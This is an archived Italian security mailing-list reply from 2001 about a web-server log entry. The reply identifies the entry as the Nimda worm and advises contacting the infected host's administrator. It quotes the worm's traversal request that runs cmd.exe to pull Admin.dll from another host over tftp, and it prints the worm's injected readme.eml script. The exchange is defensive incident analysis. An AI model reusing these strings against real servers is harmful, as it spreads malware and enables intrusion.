
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Settembre 2001 ml@sikurezza.org Soggetto: Re: Un saluto e domandina Mittente: Fabio Pietrosanti (naif) Data: 24 Sep 2001 21:31:16 -0000
On Mon, Sep 24, 2001 at 04:31:56PM +0200, Ste wrote:
> Ciao a tutti, trovo ultimamente, sempre piu' spesso nei log, questa riga:
>
> oops_id oops_url oops_ip oops_date oops_durl
> 902190 151.4.121.7 24/09/2001 14.45.00
> #?404;http://www/scripts/..S5c../winnt/system32/cmd.exe?/c tftp -i
> 151.4.121.11 GET Admin.dll e:\Admin.dll
>
> che devo fare? il signor 151.4.121.7, esiste, è vero e posso torturarlo?
> grazie a chi mi da una rispostina
Il signor 151.4.121.7, probabilmente sara' infetto da un qualche simpatico e
non ha la benche' minima idea del fastidio che ti sta causando.
E' infetto dal buon worm 'Nimda' come si vede dal suo index.html:
naif@naif:~$ lynx --source 151.4.121.7|grep readme.eml
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
Facendo un whois per il dominio presente nell'index.html ( RACINGCAMERAS.COM )
troviamo i contatti amministrativi.
Contatta la persona, avvertendola del problema, e spiegandole nel modo piu'
chiaro possibile la soluzione.
Administrative Contact, Technical Contact, Billing Contact:
Dante, Cecchin (CD6183) info@THEMOVIEFACTORY.COM
THE MOVIE FACTORY
Via Flaminia Vecchia 495
Roma
RM
00191
IT
+39-06-3332368 (FAX) +39-06-33221845
Saluti
--
Fabio Pietrosanti ( naif )
E-mail: naif@sikurezza.org - naif@blackhats.it
PGP Key (DSS) http://naif.itapac.net/naif.asc
--
Free advertising: www.openbsd.org Multiplatform Ultra-secure OS
Free Flame: IPFilter sucks !
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005